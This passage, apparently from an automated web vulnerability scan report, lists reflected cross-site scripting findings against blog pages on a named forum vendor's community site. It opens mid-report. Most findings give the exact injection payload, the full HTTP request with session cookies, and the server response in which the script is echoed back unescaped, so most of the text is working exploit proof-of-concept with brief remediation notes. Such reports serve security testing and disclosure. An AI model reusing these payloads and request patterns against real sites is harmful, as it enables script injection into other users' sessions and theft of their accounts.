...[SNIP]...
net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert
...[SNIP]...

3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8db8318b3aec88529bd6bbe8faa4161d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:47 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:51 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNrOwrgVcMFxcqQat; expires=Thu, 02-Feb-2012 23:12:51 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c1d2fc6ab0b28cb830f386445ab8cff6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:24 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:28 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNjG1rgVcMFxcmAao; expires=Thu, 02-Feb-2012 23:12:28 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 121950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1&amp;_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

3.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:16:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ae8dc79f24404a880282c7bbf5b19e4b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:16:12 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:16:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTe2rgVcMFxcqAar; expires=Thu, 02-Feb-2012 23:16:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:15:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0bbc7478bd0028f532aea9869f768f0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:15:42 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:15:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzs7AwNTG2rgVcMFxcnAao; expires=Thu, 02-Feb-2012 23:15:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e?_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'>
...[SNIP]...

3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:10:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=6d6d1d1b3d63548ae301ccd0f4821244; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:10:06 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:10:09 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwMjCzrgVcMFxcVwah; expires=Thu, 02-Feb-2012 23:10:09 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:09:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=bb0286ec98b780009858344a28ff45a6; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:09:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:09:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtDC2rgVcMFxcaQal; expires=Thu, 02-Feb-2012 23:09:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1&amp;_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

3.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=830c72b6f5c7a37fd2959ce58bae984c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:41 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:45 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwNjOyrgVcMFxcaAak; expires=Thu, 02-Feb-2012 23:12:45 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 115430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016?_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'>
...[SNIP]...

3.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f3251d120798010dc874974665fe8aeb; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:11 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:15 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzs7AwtjSyrgVcMFxcdAan; expires=Thu, 02-Feb-2012 23:13:15 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 114886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
ipt type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e";
       ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f70f43da4b3560f15ad879d5e298e90f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:01 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwNjKyrgVcMFxcuAam; expires=Thu, 02-Feb-2012 23:12:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements &#38; Anti-Fraud Protection";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:11:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9baa9e4d8417a95c12b288e362ecba30; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:11:30 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:11:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzs7AwsjS0rgVcMFxczAar; expires=Thu, 02-Feb-2012 23:11:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
